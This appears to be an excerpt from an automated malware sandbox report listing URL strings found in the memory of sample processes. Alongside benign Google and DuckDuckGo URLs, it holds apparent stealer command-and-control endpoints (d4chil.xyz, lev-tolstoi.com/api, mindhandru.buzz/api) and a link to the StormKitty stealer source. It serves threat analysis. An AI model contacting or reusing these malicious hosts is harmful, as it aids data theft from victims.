Source: BitLockerToGo.exe, 0000001A.00000002.4628840026.000000000583F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d4chil.xyz/5
Source: BitLockerToGo.exe, 0000001A.00000003.3554307178.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3457553886.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3530170826.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3505942462.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3481902303.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d4chil.xyz/K
Source: BitLockerToGo.exe, 0000001A.00000003.3554307178.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3457553886.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3530170826.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3505942462.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3481902303.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d4chil.xyz/M
Source: BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002B95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d4chil.xyz/Qj
Source: BitLockerToGo.exe, 0000001A.00000003.3554307178.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3481902303.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d4chil.xyz/c
Source: BitLockerToGo.exe, 0000001A.00000003.3554307178.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d4chil.xyz/e
Source: BitLockerToGo.exe, 0000001A.00000002.4620113858.00000000004DD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://d4chil.xyzCta
Source: BitLockerToGo.exe, 0000001A.00000002.4620113858.00000000005AC000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4620113858.00000000004DD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://d4chil.xyzData
Source: BitLockerToGo.exe, 0000001A.00000002.4620113858.00000000004DD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://d4chil.xyzge
Source: BitLockerToGo.exe, 0000001A.00000002.4620113858.000000000047C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://d4chil.xyzosh;
Source: chrome.exe, 0000001E.00000002.4061799797.0000599C0031C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.goog
Source: chrome.exe, 0000001E.00000002.4061799797.0000599C0031C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.googl0
Source: chrome.exe, 0000001E.00000002.4061799797.0000599C0031C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 0000001E.00000002.4124067524.0000599C00C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 0000001E.00000002.4119831384.0000599C0076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4119744409.0000599C00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4063003075.0000599C004D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000001E.00000002.4119831384.0000599C0076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4119744409.0000599C00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4063003075.0000599C004D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000001E.00000002.4119831384.0000599C0076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4119744409.0000599C00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4063003075.0000599C004D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 0000001E.00000002.4119744409.0000599C00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4063704789.0000599C005EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/
Source: chrome.exe, 0000001E.00000002.4124067524.0000599C00C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 0000001E.00000002.4124067524.0000599C00C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapplt
Source: chrome.exe, 0000001E.00000002.4063178908.0000599C0050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4120190161.0000599C007E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000001E.00000002.4063003075.0000599C004D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 0000001E.00000002.4063178908.0000599C0050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4120190161.0000599C007E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000001E.00000002.4061799797.0000599C0031C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 0000001E.00000002.4061799797.0000599C0031C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp
Source: chrome.exe, 0000001E.00000002.4061799797.0000599C0031C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 0000001E.00000002.4061799797.0000599C0031C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.c
Source: chrome.exe, 0000001E.00000002.4061799797.0000599C0031C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.go
Source: chrome.exe, 0000001E.00000002.4061799797.0000599C0031C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 0000001E.00000002.4061799797.0000599C0031C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 0000001E.00000003.3599322174.0000599C0120C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 0000001E.00000002.4061799797.0000599C0031C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 0000001E.00000002.4064173241.0000599C006A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 0000001E.00000002.4063704789.0000599C005EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4123783084.0000599C00BDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 0000001E.00000002.4063704789.0000599C005EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: i8Vwc7iOaG.exe, 00000000.00000003.2131707046.00000000059EB000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2131783037.00000000059EB000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2131646197.00000000059EE000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000003.2718462536.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3713220087.0000000005892000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4628840026.0000000005892000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4123897804.0000599C00C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: i8Vwc7iOaG.exe, 00000000.00000003.2131707046.00000000059EB000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2131783037.00000000059EB000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2131646197.00000000059EE000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000003.2718462536.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3713220087.0000000005892000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4628840026.0000000005892000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4123783084.0000599C00BDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 0000001E.00000002.4123783084.0000599C00BDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: chrome.exe, 0000001E.00000002.4123783084.0000599C00BDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icoY
Source: i8Vwc7iOaG.exe, 00000000.00000003.2131707046.00000000059EB000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2131783037.00000000059EB000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2131646197.00000000059EE000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000003.2718462536.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3713220087.0000000005892000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4628840026.0000000005892000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: t0IHakP.exe, 0000001D.00000002.4813359985.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: t0IHakP.exe, 0000001D.00000002.4813359985.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty0&rq
Source: soonmaintain.exe, 00000019.00000002.3786211407.000001C5AE6C0000.00000004.08000000.00040000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C08000.00000004.00000800.00020000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: soonmaintain.exe, 00000019.00000002.3786211407.000001C5AE6C0000.00000004.08000000.00040000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C08000.00000004.00000800.00020000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: soonmaintain.exe, 00000019.00000002.3786211407.000001C5AE6C0000.00000004.08000000.00040000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C08000.00000004.00000800.00020000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: chrome.exe, 0000001E.00000002.4058320134.0000434C00920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 0000001E.00000003.3579705583.0000434C0071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 0000001E.00000002.4058320134.0000434C00920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 0000001E.00000003.3579705583.0000434C0071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 0000001E.00000002.4058868154.0000599C0000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 0000001E.00000002.4063704789.0000599C005EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleusercontent.com/
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002BEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 0000001E.00000002.4119831384.0000599C0076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4119744409.0000599C00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4063003075.0000599C004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4124067524.0000599C00C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 0000001E.00000002.4119831384.0000599C0076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4119744409.0000599C00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4063003075.0000599C004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4124067524.0000599C00C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 0000001E.00000003.3579705583.0000434C0071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 0000001E.00000002.4119744409.0000599C00748000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 0000001E.00000003.3579705583.0000434C0071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 0000001E.00000003.3579705583.0000434C0071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 0000001E.00000003.3579705583.0000434C0071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 0000001E.00000002.4062687485.0000599C00428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 0000001E.00000003.3599170074.0000599C01178000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3599322174.0000599C0120C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 0000001E.00000003.3599170074.0000599C01178000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3599322174.0000599C0120C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 0000001E.00000003.3579705583.0000434C0071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 0000001E.00000003.3583113497.0000434C00878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3599170074.0000599C01178000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4058320134.0000434C00920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3599322174.0000599C0120C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 0000001E.00000003.3579705583.0000434C0071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 0000001E.00000002.4058320134.0000434C00920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 0000001E.00000002.4058320134.0000434C00920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918=
Source: k0ukcEH.exe, 0000001B.00000003.3527146391.0000000001734000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000002.3538249313.00000000016EC000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3535546010.0000000001701000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3527707379.00000000016EC000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000002.3538667957.0000000001701000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3535045174.00000000016EC000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3535045174.0000000001701000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/
Source: k0ukcEH.exe, 0000001B.00000003.3535045174.00000000016C3000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000002.3538249313.00000000016C3000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3535546010.0000000001701000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3527146391.0000000001702000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000002.3538667957.0000000001701000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3535045174.0000000001701000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api
Source: k0ukcEH.exe, 0000001B.00000003.3535045174.00000000016C3000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000002.3538249313.00000000016C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api0
Source: k0ukcEH.exe, 0000001B.00000003.3535546010.0000000001701000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000002.3538667957.0000000001701000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3535045174.0000000001701000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apiS.
Source: k0ukcEH.exe, 0000001B.00000003.3527146391.0000000001734000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3535546010.0000000001701000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000002.3538667957.0000000001701000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3535045174.0000000001701000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/x.com1
Source: k0ukcEH.exe, 0000001B.00000003.3535045174.00000000016C3000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000002.3538249313.00000000016C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com:443/api
Source: k0ukcEH.exe, 0000001B.00000003.3535045174.00000000016C3000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000002.3538249313.00000000016C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com:443/api85
Source: chrome.exe, 0000001E.00000002.4062687485.0000599C00428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 0000001E.00000002.4124067524.0000599C00C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 0000001E.00000002.4124067524.0000599C00C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: i8Vwc7iOaG.exe, 00000000.00000003.2130703360.0000000001264000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2176885217.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2348825570.00000000012D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/
Source: i8Vwc7iOaG.exe, 00000000.00000003.2348766119.0000000005A94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/-
Source: i8Vwc7iOaG.exe, 00000000.00000003.2205272038.00000000012D2000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2483274596.0000000001258000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2483422066.0000000001262000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2130703360.0000000001264000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2348956952.0000000001264000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/api
Source: i8Vwc7iOaG.exe, 00000000.00000003.2483274596.0000000001258000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2226965505.0000000001258000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2483422066.0000000001262000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2348956952.0000000001264000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/apiP
Source: i8Vwc7iOaG.exe, 00000000.00000003.2205372102.0000000001242000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/apiR=Intel6FaX
Source: i8Vwc7iOaG.exe, 00000000.00000003.2483274596.0000000001258000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2483422066.0000000001262000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/apiW
Source: i8Vwc7iOaG.exe, 00000000.00000003.2130703360.0000000001264000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/apis
Source: i8Vwc7iOaG.exe, 00000000.00000003.2130703360.0000000001256000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/apiuz
Source: i8Vwc7iOaG.exe, 00000000.00000003.2130703360.0000000001242000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/d
Source: i8Vwc7iOaG.exe, 00000000.00000003.2130703360.0000000001264000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/pi
Source: i8Vwc7iOaG.exe, 00000000.00000003.2243811943.00000000012D2000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2348825570.00000000012D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/piwf
Source: i8Vwc7iOaG.exe, 00000000.00000003.2205372102.0000000001242000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2349035521.0000000001242000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz:443/api
Source: chrome.exe, 0000001E.00000002.4063178908.0000599C0050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4120190161.0000599C007E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 0000001E.00000002.4062687485.0000599C00428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 0000001E.00000002.4062687485.0000599C00428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 0000001E.00000002.4062687485.0000599C00428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhoneaf
Source: chrome.exe, 0000001E.00000002.4062687485.0000599C00428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 0000001E.00000003.3596306857.0000599C0100F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4121988552.0000599C0096F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4122333271.0000599C009C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 0000001E.00000002.4131718103.0000599C013F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3632552875.0000599C01488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3632552875.0000599C01468000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3633170775.0000599C0142C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 0000001E.00000002.4123588300.0000599C00B90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
